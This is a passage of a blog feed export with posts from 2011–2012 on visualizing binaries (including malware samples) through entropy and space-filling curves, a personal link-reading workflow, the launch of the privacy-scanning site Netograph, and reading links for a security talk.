src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"0f5c70c82a74c8ff3d05fbf4d90bc5bf.html\">\n        <img class=\"entropy\" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'\/>\n        <img class=\"charclass\" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0fc12afe2d283b92184897b6e7bcc2c2.html\">\n        <img class=\"entropy\" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'\/>\n        <img class=\"charclass\" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"12eec9b3e0aa2e6683487c13eede2382.html\">\n        <img class=\"entropy\" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'\/>\n        <img class=\"charclass\" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0d97f71367f8b6dcb8cbc8ec964ebdbe.html\">\n        <img class=\"entropy\" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'\/>\n        <img class=\"charclass\" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"18f9ede7d921742f963a0eb06887fdfa.html\">\n        <img class=\"entropy\" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'\/>\n        <img class=\"charclass\" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr><tr>\n<td>\n    <a href=\"16c533cc9b3dac1bde9885b4bd967bff.html\">\n        <img class=\"entropy\" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'\/>\n        <img class=\"charclass\" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"0eab36fc4307a1fd3ad8d832c526cf40.html\">\n        <img class=\"entropy\" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'\/>\n        <img class=\"charclass\" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"17fa099ecef82edd1e4ddc61be575ae4.html\">\n        <img class=\"entropy\" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'\/>\n        <img class=\"charclass\" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"07ddb50c4cc358fc3718847684ca5fae.html\">\n        <img class=\"entropy\" src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'\/>\n        <img class=\"charclass\" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'\/>\n    <\/a>\n<\/td>\n<td>\n    <a href=\"04fee7e6dedf912b4a72886486627b05.html\">\n        <img class=\"entropy\" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'\/>\n        <img class=\"charclass\" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'\/>\n    <\/a>\n<\/td>\n<\/tr>\n<\/table>\n<p>Clicking will show you high-detail versions of both visualizations, and let you\nlook up the binary hash to see what it is. I've used a square Hilbert curve\nlayout - the files start in the top-left corner, and pass through the quadrants\nclockwise.<\/p>\n<p>I spent hours looking through thousands these visualizations today. I find them\neerie and rather beautiful - an entirely different perspective from my\nday-to-day interactions with malware.<\/p>\n"},{"title":"Visualizing entropy in binary files","published":"2012-01-04T00:00:00+00:00","updated":"2012-01-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/entropy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/entropy\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>Last week, I wrote about <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">visualizing binary files using space-filling\ncurves<\/a>, a technique I use when I need to\nget a quick overview of the broad structure of a file. Today, I'll show you an\nelaboration of the same basic idea - still based on space-filling curves, but\nthis time using a colour function that measures local entropy.<\/p>\n<p>Before I get to the details, let's quickly talk about the motivation for a\nvisualization like this. We can think of entropy as the degree to which a chunk\nof data is disordered. If we have a data set where all the elements have the\nsame value, the amount of disorder is nil, and the entropy is zero. If the data\nset has the maximum amount of heterogeneity (i.e. all possible symbols are\nrepresented equally), then we also have the maximum amount of disorder, and thus\nthe maximum amount of entropy. There are two common types of high-entropy data\nthat are of special interest to reverse engineers and penetration testers. The\nfirst is compressed data - finding and extracting compressed sections is a\ncommon task in many security audits. The second is cryptographic material -\nwhich is obviously at the heart of most security work. Here, I'm referring not\nonly to key material and certificates, but also to hashes and actual encrypted\ndata. As I show below, a tool like the one I'm describing today can be highly\nuseful in spotting this type of information.<\/p>\n<p>For this visualization, I use the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Entropy_(information_theory)\">Shannon\nentropy<\/a> measure to\ncalculate byte entropy over a sliding window. This gives us a \"local entropy\"\nvalue for each byte, even though the concept doesn't really apply to single\nsymbols.<\/p>\n<p>With that out of the way, let's look at some pretty pictures.<\/p>\n<h2 id=\"visualizing-the-osx-ksh-binary\">Visualizing the OSX ksh binary<\/h2>\n<p>In my previous post, I used the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Korn_shell\">ksh<\/a>\nbinary as a guinea pig, and I'll do the same here. On the left is the entropy\nvisualization with colours ranging from black for zero entropy, through shades\nof blue as entropy increases, to hot pink for maximum entropy. On the right is\nthe Hilbert curve visualization from the last post for comparison - see <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">the\npost itself<\/a> for an explanation of the\ncolour scheme. Click for larger versions with much more detail:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-entropy-large.png\">\n        <img src=\"hilbert-entropy.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        entropy\n    <\/div>\n    \n<\/div><div class=\"media\">\n    <a href=\"..&#x2F;binvis&#x2F;binary-large-hilbert.png\">\n        <img src=\"..&#x2F;binvis&#x2F;binary-hilbert.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        byte class\n    <\/div>\n    \n<\/div>\n<p>Note that this is a dual-architecture\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Mach-O\">Mach-O<\/a> file, containing code for both\ni386 and x86_64. You can see this if you squint somewhat at these images - some\nbroad structures in the file are repeated twice. We can see that there are a\nnumber of different sections of the <strong>ksh<\/strong> binary that have very high entropy.\nIt's not immediately obvious why a system binary would contain either\ncompressed sections or cryptographic material. As it happens, the explanation\nin this case is quite interesting. Let's have a closer look:<\/p>\n<div class=\"media\">\n    <a href=\"entropy-annotated.png\">\n        <img src=\"entropy-annotated.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Sections <strong>1<\/strong> and <strong>2<\/strong> are a lovely validation of the central idea of this\npost. These two areas do indeed contain cryptographic material - in this case,\n<a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/mac\/#technotes\/tn2206\/_index.html\">code signing hashes and\ncertificates<\/a>.\nRather satisfyingly, they stand out like a sore thumb. It turns out that all of\nthe official OSX binaries are signed by Apple. This is then used in turn to\napply <a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/mac\/#technotes\/tn2206\/_index.html\">a variety of\npolicies<\/a>,\ndepending on who the signatory is, and whether they are trusted.<\/p>\n<p>You can dump some rudimentary data about a binary's signature using the\n<strong>codesign<\/strong> command (which you can also use to sign binaries yourself):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>&gt; codesign -dvv \/bin\/ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Executable=\/bin\/ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Identifier=com.apple.ksh<\/span><\/span>\n<span class=\"giallo-l\"><span>Format=Mach-O universal (i386 x86_64)<\/span><\/span>\n<span class=\"giallo-l\"><span>CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded<\/span><\/span>\n<span class=\"giallo-l\"><span>Signature size=4064<\/span><\/span>\n<span class=\"giallo-l\"><span>Authority=Software Signing<\/span><\/span>\n<span class=\"giallo-l\"><span>Authority=Apple Code Signing Certification Authority<\/span><\/span>\n<span class=\"giallo-l\"><span>Authority=Apple Root CA<\/span><\/span>\n<span class=\"giallo-l\"><span>Info.plist=not bound<\/span><\/span>\n<span class=\"giallo-l\"><span>Sealed Resources=none<\/span><\/span>\n<span class=\"giallo-l\"><span>Internal requirements count=1 size=92<\/span><\/span><\/code><\/pre>\n<p>Section <strong>3<\/strong> (the two occurrences are the same data repeated for each\narchitecture) is interesting for a different reason - it's a cautionary example\nof how the simple entropy measure we're using sometimes detects high entropy in\nhighly structured data. A hex dump of the start of the region looks like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>000d1f00  00 01 00 00 00 02 00 00  00 06 00 00 00 00 00 00  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f20  00 01 02 03 04 05 06 07  08 09 0a 0b 0c 0d 0e 0f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f30  10 11 12 13 14 15 16 17  18 19 1a 1b 1c 1d 1e 1f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f40  20 21 22 23 24 25 26 27  28 29 2a 2b 2c 2d 2e 2f  | !&quot;#$%&amp;&#39;()*+,-.\/|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f50  30 31 32 33 34 35 36 37  38 39 3a 3b 3c 3d 3e 3f  |0123456789:;&lt;=&gt;?|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f60  40 41 42 43 44 45 46 47  48 49 4a 4b 4c 4d 4e 4f  |@ABCDEFGHIJKLMNO|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f70  50 51 52 53 54 55 56 57  58 59 5a 5b 5c 5d 5e 5f  |PQRSTUVWXYZ[\\]^_|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f80  60 61 62 63 64 65 66 67  68 69 6a 6b 6c 6d 6e 6f  |`abcdefghijklmno|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1f90  70 71 72 73 74 75 76 77  78 79 7a 7b 7c 7d 7e 7f  |pqrstuvwxyz{|}~.|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fa0  80 81 82 83 84 85 86 87  88 89 8a 8b 8c 8d 8e 8f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fb0  90 91 92 93 94 95 96 97  98 99 9a 9b 9c 9d 9e 9f  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fc0  a0 a1 a2 a3 a4 a5 a6 a7  a8 a9 aa ab ac ad ae af  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fd0  b0 b1 b2 b3 b4 b5 b6 b7  b8 b9 ba bb bc bd be bf  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1fe0  c0 c1 c2 c3 c4 c5 c6 c7  c8 c9 ca cb cc cd ce cf  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d1ff0  d0 d1 d2 d3 d4 d5 d6 d7  d8 d9 da db dc dd de df  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d2000  e0 e1 e2 e3 e4 e5 e6 e7  e8 e9 ea eb ec ed ee ef  |................|<\/span><\/span>\n<span class=\"giallo-l\"><span>000d2010  f0 f1 f2 f3 f4 f5 f6 f7  f8 f9 fa fb fc fd fe ff  |................|<\/span><\/span><\/code><\/pre>\n<p>We see that this section contains each byte value from 0x00 to 0xff in order -\nfurthermore this whole block is repeated with minor variations a number of\ntimes. There are two things to explain here - why is this detected as \"high\nentropy\" data, and what the heck is it doing in the file?<\/p>\n<p>First, we need to understand that the Shannon entropy measure looks only at the\nrelative occurrence frequencies of individual symbols (in this case, bytes). A\nchunk of data like the one above therefore looks like it has high entropy,\nbecause each symbol occurs once and only once, making the data highly\nheterogeneous.<\/p>\n<p>Now, what earthly use would chunks of data like this be? With a bit of digging,\nI found the answer in the <strong>ksh<\/strong> source code. These sections are maps used for\ntranslation between various <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/EBCDIC\">character<\/a>\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/ASCII\">encodings<\/a>. If you're interested, here's\nthe <a rel=\"external\" href=\"http:\/\/opensource.apple.com\/source\/ksh\/ksh-13\/ksh\/src\/lib\/libast\/string\/ccmap.c\">culprit in all its repetitive\nglory<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, the code for generating all of the images in this post is up on\nGitHub. The entropy visualizations were created with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\/blob\/master\/binvis\">binvis<\/a>, a new addition\nto <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, my compendium of code related\nto space-filling curves.<\/p>\n"},{"title":"A personal link mill","published":"2011-12-30T00:00:00+00:00","updated":"2011-12-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/linkmill\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/linkmill\/","content":"<p>I posted a link to an interesting visualization paper on Twitter today,\n<a rel=\"external\" href=\"https:\/\/twitter.com\/#!\/__mharrison__\/status\/152503684822081537\">prompting someone to ask me where I had found\nit<\/a>. Sadly, I\nhad to admit that I had no clue where I first saw it referenced, due to the way\nI consume links I find on the net. So, I thought I'd write a quick blog post to\nexplain myself, and then pitch a product idea that could make my life (and maybe\nyours) much easier.<\/p>\n<p>First, the problem statement: my aim is to efficiently discover links to\ninteresting stuff on the net. Simple as that. A few years ago, my flow of links\ncame mostly from social news sites (<a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>\nand <a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>), and items shared by people I follow on social\nnetworks. Over time, I became more and more disenchanted with this way of doing\nthings. The social news approach is to take a torrent of very low quality links\n(user submissions), and then crowd-source the filtration process through voting.\nBut popularity is not a good measure of information quality, and the result is a\nbland, lowest-common-denominator view of the world that has no room for anything\nthat doesn't make it to the front page. Don't get me wrong - Reddit and HN do a\nlot of other things well - but they just don't cut it as primary information\nsources. Mining links from social networks is a more promising approach, but\nstill problematic. None of the social networks provide the tools needed to\nextract shared links from the update stream and consume them efficiently. There\nis also a structural issue - I don't necessarily want to mix my social ties and\nmy information sources, and I definitely don't want to be limited to just one\nplatform. These are separate functions that I feel require separate tools.<\/p>\n<h2 id=\"my-personal-link-mill\">My personal link mill<\/h2>\n<p>Eventually, I took matters into my own hands. First, I hugely broadened the\nnumber of information sources I consumed. The tool I use for this is Google\nReader - I now subscribe to about 800 individual feeds, and this number is\ngrowing daily. The trick here is to find high-quality, low-volume link sources.\nThe motherlode of good links for me was to be found on social bookmarking sites.\nAbout 700 of my subscriptions are to the RSS feeds of individual users on\n<a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a> and <a rel=\"external\" href=\"http:\/\/delicious.com\">Delicious<\/a>. This gives\nme very fine control and a great mix of interests. Plus, getting links from\nindividual curators handily sidesteps the social news group-think problem. The\nremainder of my subscriptions are split between blogs, some sub-Reddits, a few\nTwitter users and subsections of <a rel=\"external\" href=\"http:\/\/arxiv.org\">arXiv<\/a>.<\/p>\n<p>So much for how my intake works. Just as important is the way that I consume\nit. I do my \"filtering\" in batches, usually in the evening. Using\n<a rel=\"external\" href=\"http:\/\/reederapp.com\/\">Reeder<\/a> on my iPad works well for me, letting me flick\n#quickly and comfortably through all the new links of the day. When I find\nsomething that looks interesting, I resist the temptation to read it then and\nthere - instead, I batch up all my reading for later. If it's a web page, it\ngoes to <a rel=\"external\" href=\"http:\/\/www.instapaper.com\/\">Instapaper<\/a>.  If it's a PDF, it gets\ndownloaded into a <a rel=\"external\" href=\"http:\/\/www.dropbox.com\/\">DropBox<\/a> folder, which is synced to\n<a rel=\"external\" href=\"http:\/\/www.goodiware.com\/goodreader.html\">GoodReader<\/a>.<\/p>\n<p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my\niPad, and read all the interesting stuff I saved the previous day in a single\nsitting. I'm ruthless about just skimming things that don't warrant careful\nattention. If I find something particularly interesting I save it permanently,\nand perhaps tweet it or mail it to someone I think might be interested.<\/p>\n<h2 id=\"problems-and-a-product-idea\">Problems - and a product idea?<\/h2>\n<p>This system works for me, but it has many problems. There's no end-to-end\ncoordination, so by the time I sit down to actually read something, I have no\neasy way to tell which feed it came from. Google Reader sucks at managing\nhundreds of low-volume subscriptions. Reeder is a great, but is not tailored to\nconsuming redundant information from many sources. The end result is that\nmaintaining the system I have is a time-consuming pain in the ass. The fact\nthat it's still worth it despite this, makes me think there might be commercial\nroom for a better solution.<\/p>\n<p>Which brings me to a rough product idea - a formalized version of this link\nmill for people who want to take direct control of their information intake.\nThe business end is a generalized feed consumer, letting you subscribe to RSS\nfeeds, Twitter users, Google+ updates, sub-Reddits and other information\nsources.  Links are extracted from these feeds, keeping track of which links\nappeared where. The user is then presented with a stream of links to consume,\nde-duplicated so that those appearing in multiple feeds are presented only\nonce. The system keeps track of links the user marks as \"interesting\", batching\nthem for later consumption. It also uses this information to score the feeds,\nletting the user see which feeds are low quality, and should be ditched. Given\nthe right tools, the time needed for a user to maintain and tend their link\nfeed garden would be quite modest, and the rewards would be great.<\/p>\n<p>If someone built this, I for one would gladly fork over some of my hard-earned\ndoubloons to use it. In fact, with some validation of the idea and a few\ncollaborators I might think of building it myself. Does this sound useful to\nanyone else?<\/p>\n"},{"title":"Visualizing binaries with space-filling curves","published":"2011-12-23T00:00:00+00:00","updated":"2011-12-23T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/binvis\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/binvis\/","content":"<p><b>Edit: Since this post, I've created an interactive tool for binary\nvisualisation - see it at <a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/b><\/p>\n<p>In my day job I often come across binary files with unknown content. I have a\nset of standard avenues of attack when I confront such a beast - use \"file\" to\nsee if it's a known file type, \"strings\" to see if there's readable text, run\nsome in-house code to extract compressed sections, and, of course, fire up a hex\neditor to take a direct look. There's something missing in that list, though - I\nhave no way to get a quick view of the overall structure of the file.  Using a\nhex editor for this is not much chop - if the first section of the file looks\nrandom (i.e. probably compressed or encrypted), who's to say that there isn't a\nchunk of non-random information a meg further down? Ideally, we want to do this\ntype of broad pattern-finding by eye, so a visualization seems to be in order.<\/p>\n<p>First, lets begin by picking a colour scheme. We have 256 different byte values,\nbut for a first-pass look at a file, we can compress that down into a few common\nclasses:<\/p>\n<table>\n    <tr>\n        <td style=\"background-color: #000000\">&nbsp;<\/td>\n        <td>0x00<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #ffffff\">&nbsp;<\/td>\n        <td>0xFF<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #377eb8\">&nbsp;<\/td>\n        <td>Printable characters<\/td>\n    <\/tr>\n    <tr>\n        <td style=\"background-color: #e41a1c\">&nbsp;<\/td>\n        <td>Everything else<\/td>\n    <\/tr>\n<\/table>\n<p>This covers the most common padding bytes, nicely highlights strings, and lumps\neverything else into a miscellaneous bucket. The broad outline of what we need\nto do next is clear - we sample the file at regular intervals, translate each\nsampled byte to a colour, and write the corresponding pixel to our image. This\nbrings us to the big question - what's the best way to arrange the pixels? A\nfirst stab might be to lay the pixels out row by row, snaking to and fro to make\nsure each pixel is always adjacent to its predecessor. It turns out, however,\nthat this zig-zag pattern is not very satisfying - small scale features (i.e.\nfeatures that take up only a few lines) tend to get lost.  What we want is a\nlayout that maps our one-dimensional sequence of samples onto the 2-d image,\nwhile keeping elements that are close together in one dimension as near as\npossible to each other in two dimensions.  This is called \"locality\npreservation\", and the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Space-filling_curve\">space-filling\ncurves<\/a> are a family of\nmathematical constructs that have precisely this property. If you're a regular\nreader of this blog, you may know that I have an\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">almost<\/a>\n<a href=\"https:\/\/corte.si\/posts\/code\/sortvis-fruitsalad\/\">unseemly<\/a>\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/swatches\/\">fondness<\/a> for these critters. So, lets\nadd a couple of space-filling curves to the mix to see how they stack up. The\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Z-order_curve\">Z-Order curve<\/a> has found wide\npractical use in computer science. It's not the best in terms of locality\npreservation, but it's easy and quick to compute. The <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Hilbert_curve\">Hilbert\ncurve<\/a>, on the other hand, is\n(nearly) as good as it gets at locality preservation, but is much more\ncomplicated to generate. Here's what our three candidate curves look like - in\neach case, the traversal starts in the top-left corner:<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <img src=\"zigzag.png\"\/>\n            <h4>Zigzag<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"zorder.png\"\/>\n            <h4>Z-order<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <img src=\"hilbert.png\"\/>\n            <h4>Hilbert<\/h4>\n        <\/div>\n    <\/div>\n<\/div>\n<p>And here they are, visualizing the\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Korn_shell\">ksh<\/a>\n(<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Mach-O\">Mach-O<\/a>,\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Fat_binary\">dual-architecture<\/a>) binary\ndistributed with OSX - click for the significantly more spectacular larger\nversions of the images:<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <a href=\"binary-large-zigzag.png\"><img src=\"binary-zigzag.png\"\/><\/a>\n            <h4>Zigzag<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"binary-large-zorder.png\"><img src=\"binary-zorder.png\"\/><\/a>\n            <h4>Z-order<\/h4>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"binary-large-hilbert.png\"><img src=\"binary-hilbert.png\"\/><\/a>\n            <h4>Hilbert<\/h4>\n        <\/div>\n    <\/div>\n<\/div>\n<p>The classical Hilbert and Z-Order curves are actually square, so for these\nvisualizations I've unrolled them, stacking four sub-curves on top of each\nother.  To my eye, the Hilbert curve is the clear winner here. Local features\nare prominent because they are nicely clumped together. The Z-order curve shows\nsome annoying artifacts with contiguous chunks of data sometimes split between\ntwo or more visual blocks.<\/p>\n<p>The downside of the space-filling curve visualizations is that we can't look at\na feature in the image and tell where, exactly, it can be found in the file.\nI'm toying with the idea (though not very seriously) of writing an interactive\nbinary file viewer with a space-filling curve navigation pane. This would let\nthe user click on or hover over a patch of structure and see the file offset\nand the corresponding hex.<\/p>\n<h2 id=\"more-detail\">More detail<\/h2>\n<p>We can get more detail in these images by increasing the granularity of the\ncolour mapping. One way to do this is to use a trick I first concocted to\n<a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">visualize the Hilbert Curve at\nscale<\/a>. The basic idea is to use a\n3-d Hilbert curve traversal of the RGB colour cube to create a palette of\ncolours. This makes use of the locality-preserving properties of the Hilbert\ncurve to make sure that similar elements have similar colours in the\nvisualization. See the <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">original\npost<\/a> for more.<\/p>\n<p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order\ntraversal of the RGB cube as a colour palette. Again, click on the image for\nthe much nicer large scale version:<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-hilbert-large.png\">\n        <img src=\"hilbert-hilbert.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This shows significantly more fine-grained structure, which might be good for a\ndeep dive into a binary. On the other hand, the colours don't map cleanly to\ndistinct byte classes, so the image is harder to interpret. An ideal hex viewer\nwould let you flick between the two palettes for navigation.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, I'm publishing the code for generating all of the images in this\npost. The binary visualizations were created with\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\/blob\/master\/binvis\">binvis<\/a>, which is a new\naddition to <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">scurve<\/a>, my space-filling curve\nproject. The curve diagrams were made with the \"drawcurve\" utility to be found\nin the same place.<\/p>\n"},{"title":"netograph.com - Realtime privacy snapshots of the social web","published":"2011-12-08T00:00:00+00:00","updated":"2011-12-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/netograph\/launch\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/netograph\/launch\/","content":"<p>Today, I'm launching <a rel=\"external\" href=\"http:\/\/netograph.com\">Netograph<\/a>, a new privacy-related\nsite that I've been hacking on over the past few months. The goal of the project\nis to provide you with a quick overview of the privacy picture for a URL,\n<strong>before<\/strong> you've clicked on the link. At the moment, Netograph scans\n<a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>, <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>,\n<a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a>, <a rel=\"external\" href=\"http:\/\/delicous.com\">Delicous<\/a> and\n<a rel=\"external\" href=\"http:\/\/digg.com\">Digg<\/a> - links on these sites should show up within a few\nminutes of submission.<\/p>\n<p>For more details, head over to <a rel=\"external\" href=\"http:\/\/netograph.com\">netograph.com<\/a>. There you\nwill also find\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/netograph\/\">Firefox<\/a> and\n<a rel=\"external\" href=\"https:\/\/chrome.google.com\/webstore\/detail\/bfhmbldbigkpniinkmckafbgcajcbaai\">Chrome<\/a>\nbrowser addons that let you view the Netograph report for a URL instantly with a\nright-click. Enjoy!<\/p>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/1740\">\n                <img src=\"ng-guardian.png\">\n                guardian.co.uk\n            <\/a>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/2512\">\n                <img src=\"ng-techcrunch.png\">\n                techcrunch.com\n            <\/a>\n        <\/div>\n        <div class=\"column\">\n            <a href=\"http:\/\/netograph.com\/starmap\/2457\">\n                <img src=\"ng-reddit.png\">\n                reddit.com\n            <\/a>\n        <\/div>\n    <\/div>\n<\/div>\n<h2 id=\"what-s-next\">What's next?<\/h2>\n<p>This is just the first step. As I hinted in a <a href=\"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/\">previous\npost<\/a>, the most interesting\nresults from Netograph are likely to come from aggregating and\ncross-correlating the data for individual URLs. I'm already hard at work on\nthis - the next iteration of Netograph will aim to shine some light on the\nsometimes shadowy network of third-parties that track and analyze nearly every\nURL we visit. I will also be publishing some interesting tidbits from this data\ncorpus on my blog as I go along, so watch this space.<\/p>\n"},{"title":"Otago Polytechnic Talk","published":"2011-10-31T00:00:00+00:00","updated":"2011-10-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/talks\/polytech\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/talks\/polytech\/","content":"<p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:<\/p>\n<ul>\n<li>The talk I'm not giving: <a rel=\"external\" href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2010-Main\">OWASP Top\n10<\/a><\/li>\n<li>Tools: <a rel=\"external\" href=\"http:\/\/getfirebug.com\/\">FireBug<\/a>,\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/tamper-data\/\">TamperData<\/a>,\n<a rel=\"external\" href=\"http:\/\/python.org\">Python<\/a>.<\/li>\n<li>The <a href=\"http:\/\/en.wikipedia.org\/wiki\/Samy_(XSS)\">Myspace Worm<\/a>, and\nSamy Kamkar's <a rel=\"external\" href=\"http:\/\/namb.la\/popular\/tech.html\">own explanation of the\nexploit<\/a>.<\/li>\n<li>Halvar Flake's <a rel=\"external\" href=\"http:\/\/www.immunityinc.com\/infiltrate\/2011\/presentations\/Fundamentals_of_exploitation_revisited.pdf\">Programming and state\nmachines<\/a>,\nwhich is where I first saw the term \"programming the weird machine\".<\/li>\n<\/ul>\n"},{"title":"Neighborhoods of trust on the web","published":"2011-09-27T00:00:00+00:00","updated":"2011-09-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/privacy\/neighbourhoods-of-trust\/","content":"<p>For the last fortnight I've been hard at work on a new project that aims to\nexamine trust and security on the web at scale. The basic idea is to use a\nbrowser instance to render a URL, and then to extract all persistent state with\nbrowser forensic techniques afterwards. This gives you a dump of cookies, cache\ncontents, Flash storage, HTML5 databases, and so on. 